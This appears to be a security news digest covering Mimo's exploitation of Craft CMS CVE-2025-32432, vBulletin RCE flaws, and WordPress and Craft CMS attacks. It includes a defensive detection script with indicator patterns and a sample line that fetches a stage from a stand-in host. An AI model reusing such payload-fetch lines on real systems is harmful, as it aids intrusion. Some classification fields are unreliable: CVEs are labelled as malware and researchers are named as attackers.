CyberSecurity news

FlagThis - #websecurity

The Hacker News@The Hacker News //
A new cyber threat has emerged, with the threat actor known as Mimo exploiting a recently disclosed remote code execution vulnerability, CVE-2025-32432, in the Craft Content Management System (CMS). The attackers are leveraging this vulnerability to deploy a suite of malicious payloads, including a cryptocurrency miner, a loader dubbed Mimo Loader, and residential proxyware on compromised websites. This allows them to not only abuse system resources for illicit cryptocurrency mining, but also monetize the victim's internet bandwidth for other malicious activities.

The exploitation of CVE-2025-32432 unfolds in two phases. The attacker activates a web shell by injecting PHP code via a specially crafted GET request. This action triggers a redirection, prompting the application to record the return URL within a server-side PHP session file. Once the web shell is enabled, commands can be executed remotely. The web shell is used to download and execute a shell script, which checks for indicators of prior infection and uninstalls any existing cryptocurrency miners before delivering next-stage payloads and launching the Mimo Loader.

The Mimo Loader modifies "/etc/ld.so.preload" to hide the malware process. Its ultimate goal is to deploy the IPRoyal proxyware and the XMRig miner on the compromised host. Sekoia researchers Jeremy Scion and Pierre Le Bourhis noted the unusual choice of aliasing the Python library "urllib2" as "fbi", which they suggest may be a tongue-in-cheek nod to the American federal agency; the idiosyncratic alias is distinctive enough to serve as a potential detection indicator. The activity has been linked to the Mimo intrusion set, which has been active since at least March 2022 and has previously exploited vulnerabilities in Apache Log4j, Atlassian Confluence, PaperCut, and Apache ActiveMQ.
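The two host-level indicators the write-up names, tampering with "/etc/ld.so.preload" and a Python payload that aliases urllib2 as "fbi", can be checked with a short script. The following is an added example written for this page; it is not code from Sekoia's report or from the Mimo toolset. The preload allowlist (empty, meaning a clean host has no preload entries) is an assumption to be replaced with your own baseline, and the sample preload file and sample script are constructed inputs so the checks run offline.

```python
"""Audit a host for two indicators described above: unexpected entries in
/etc/ld.so.preload and Python scripts that alias urllib2 as "fbi".
Added example, not the report's code; the allowlist and samples are assumptions."""
import re
import sys
from pathlib import Path
from typing import Iterable

PRELOAD_PATH = Path("/etc/ld.so.preload")

# Assumption: a clean baseline has no preload entries. If your fleet deliberately
# preloads a library, add its absolute path here (constructed placeholder list).
PRELOAD_ALLOWLIST: frozenset = frozenset()

# The write-up notes the payload aliases the Python library urllib2 as "fbi".
FBI_ALIAS_PATTERNS = (
    re.compile(r"\burllib2\s+as\s+fbi\b"),                 # import urllib2 as fbi
    re.compile(r"\bfrom\s+urllib2\s+import\b.*\bas\s+fbi\b"),  # from urllib2 import x as fbi
)


def parse_preload(content: str) -> list:
    """Split ld.so.preload content the way glibc's loader does: text from '#'
    to end of line is a comment, entries are separated by whitespace or ':'.
    Duplicates are dropped while preserving file order."""
    without_comments = re.sub(r"#[^\n]*", " ", content)
    entries = []
    for token in re.split(r"[\s:]+", without_comments):
        if token and token not in entries:
            entries.append(token)
    return entries


def audit_preload(content: str, allowlist: Iterable = PRELOAD_ALLOWLIST) -> list:
    """Return preload entries that are not on the allowlist, in file order."""
    allowed = set(allowlist)
    return [entry for entry in parse_preload(content) if entry not in allowed]


def find_fbi_alias(script: str) -> list:
    """Return 1-based line numbers where urllib2 is aliased as 'fbi'."""
    hits = []
    for lineno, line in enumerate(script.splitlines(), start=1):
        if any(pattern.search(line) for pattern in FBI_ALIAS_PATTERNS):
            hits.append(lineno)
    return hits


# Constructed samples (not indicators taken from the report) for offline runs.
SAMPLE_PRELOAD = "# managed by nobody\n/tmp/.x/libhide.so\n"
SAMPLE_SCRIPT = (
    "#!/usr/bin/env python\n"
    "import urllib2 as fbi\n"
    "resp = fbi.urlopen('http://example.invalid/stage')\n"
)


def main(argv: list) -> int:
    """Audit the live /etc/ld.so.preload and any script paths given on argv.
    Returns 1 if anything suspicious was found, else 0."""
    findings = 0
    if PRELOAD_PATH.exists():
        for entry in audit_preload(PRELOAD_PATH.read_text(errors="replace")):
            print(f"[preload] unexpected entry: {entry}")
            findings += 1
    for path in argv:
        text = Path(path).read_text(errors="replace")
        for lineno in find_fbi_alias(text):
            print(f"[alias] {path}:{lineno}: urllib2 aliased as fbi")
            findings += 1
    if not argv and not PRELOAD_PATH.exists():
        # Nothing live to check: demonstrate on the constructed samples.
        print("sample preload:", audit_preload(SAMPLE_PRELOAD))
        print("sample script hits:", find_fbi_alias(SAMPLE_SCRIPT))
    return 1 if findings else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))
```

Run it as root with any script paths you want scanned (for example files dropped under the web root); a non-zero exit means the preload file carries an entry outside your baseline or a script matches the alias pattern. The preload parsing mirrors glibc's handling of comments and separators so that an entry hidden after a "#" line or joined with ":" is still surfaced.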

References:
  • blog.sekoia.io: Jeremy Scion, Pierre Le Bourhis & Sekoia TDR present an analysis of the compromise chain initiated by the exploitation of CVE-2025-32432. The exploitation occurred in a CMS honeypot and led to a loader, a crypto miner, and a residential proxyware.
  • bsky.app: Sekoia has identified Mimo, a threat actor that exploits a recently patched Craft CMS zero-day to deploy its own loader, cryptominers, and residential proxyware on hacked websites
  • The Hacker News: Mimo Hackers Exploit CVE-2025-32432 in Craft CMS to Deploy Cryptominer and Proxyware
  • securityonline.info: Mimo Returns: CVE-2025-32432 Exploited in Cryptomining and Proxyware Campaigns
  • ciso2ciso.com: Mimo Hackers Exploit CVE-2025-32432 in Craft CMS to Deploy Cryptominer and Proxyware – Source:thehackernews.com
  • bsky.app: Sekoia has identified Mimo, a threat actor that exploits a recently patched Craft CMS zero-day to deploy its own loader, cryptominers, and residential proxyware on hacked websites The operators appear to be based in the Middle East
  • Virus Bulletin: Jeremy Scion, Pierre Le Bourhis & Sekoia TDR present an analysis of the compromise chain initiated by the exploitation of CVE-2025-32432. The exploitation occurred in a CMS honeypot and led to a loader, a crypto miner, and a residential proxyware.
Classification:
  • HashTags: #CraftCMS #Cryptominer #Proxyware
  • Company: Craft CMS
  • Target: Websites
  • Attacker: Mimo
  • Product: Craft CMS
  • Feature: 0-day
  • Malware: CVE-2025-32432
  • Type: 0Day
  • Severity: Critical
Bill Toulas@BleepingComputer //
Two critical vulnerabilities, CVE-2025-48827 and CVE-2025-48828, have been identified in vBulletin forum software, impacting versions 5.0.0 through 5.7.5 and 6.0.0 through 6.0.3. The vulnerabilities enable API abuse and remote code execution, posing a significant threat to forums running the affected versions. Security experts warn that one of these vulnerabilities is already being actively exploited in the wild, making it crucial for administrators to take immediate action.

The flaws are rated as critical, with CVE-2025-48827 receiving a CVSS v3 score of 10.0 and CVE-2025-48828 receiving a score of 9.0. CVE-2025-48827 is an API method invocation issue, allowing unauthenticated users to invoke protected API controllers' methods when running on PHP 8.1 or later. The second flaw, CVE-2025-48828, enables attackers to run arbitrary PHP code by abusing template conditionals. Both vulnerabilities were discovered by security researcher Egidio Romano on May 23, 2025, and exploit attempts were observed in the wild shortly after disclosure.

vBulletin users are urged to immediately apply patches released last year that remediate both vulnerabilities or to upgrade to the latest version 6.1.1. The vulnerabilities were likely patched quietly last year with the release of Patch Level 1 for all versions of the 6.* release branch. Security researchers recommend that defenders and developers review their frameworks and custom APIs, especially if they are dynamically routing controller methods through Reflection. They also suggest auditing access restrictions and examining application behavior across different PHP versions to prevent similar exploits.

References:
  • cyberpress.org: Severe vBulletin Forum Flaw Enables Remote Code Execution
  • securityonline.info: Critical Pre-Auth RCE: vBulletin Flaw Allows Full Server Compromise (PoC Available)
  • infosec.exchange: A newly discovered vulnerability in vBulletin, one of the world’s most popular forum platforms, has exposed thousands of online communities to the risk of unauthenticated Remote Code Execution
  • Cyber Security News: Severe vBulletin Forum Flaw Enables Remote Code Execution
  • securityaffairs.com: SecurityAffairs reports Two flaws in vBulletin forum software are under attack.
  • BleepingComputer: Hackers are exploiting critical flaw in vBulletin forum software.
  • www.scworld.com: Attacks exploiting maximum severity vBulletin vulnerability ongoing
Classification:
  • HashTags: #vBulletin #RCE #Exploit
  • Company: vBulletin
  • Target: vBulletin forum users
  • Product: vBulletin
  • Feature: Remote Code Execution
  • Malware: CVE-2025-48827, CVE-2025-48828
  • Type: Vulnerability
  • Severity: Critical
Daryna Olyniychuk@SOC Prime Blog //
Attackers are actively exploiting vulnerabilities in popular content management systems (CMS) like WordPress and Craft CMS to gain unauthorized access to web servers. These attacks highlight the critical need for website administrators to stay vigilant and promptly apply security patches. A significant phishing campaign has been identified targeting WordPress WooCommerce users, where victims are tricked into downloading a fake security patch that actually installs a backdoor on their sites, allowing attackers persistent access.

Craft CMS is also facing active exploitation of a critical vulnerability, CVE-2025-32432, which allows for Remote Code Execution (RCE). This flaw is particularly dangerous as it is being chained with another vulnerability, CVE-2024-58136 in the Yii framework, to facilitate zero-day attacks. These chained exploits enable attackers to breach servers and steal sensitive data. Researchers are urging Craft CMS users to update to patched versions immediately to mitigate the risk.

An investigation into a compromised server revealed that attackers used CVE-2025-32432 to download a PHP-based file manager, which then enabled them to upload further malicious PHP files. The investigation involved analyzing access logs from the web server and Craft CMS logs, including web logs and phperrors.log, to identify the attacker's actions. The attack leverages Craft CMS's asset management system, exploiting a flaw in how the system handles asset IDs and image transformations.

References:
  • securityaffairs.com: A large-scale phishing campaign targets WordPress WooCommerce users with a fake security alert urging them to download a ‘critical patch’ hiding a backdoor.
Classification:
  • HashTags: #WordPress #CraftCMS #WebSecurity
  • Company: WordPress
  • Target: Web Servers, WooCommerce Users
  • Attacker: Patchstack, Orange Cyberdefense’s CSIRT
  • Product: WordPress WooCommerce, Craft CMS
  • Feature: Malicious Plugin
  • Malware: Backdoor
  • Type: Hack
  • Severity: Major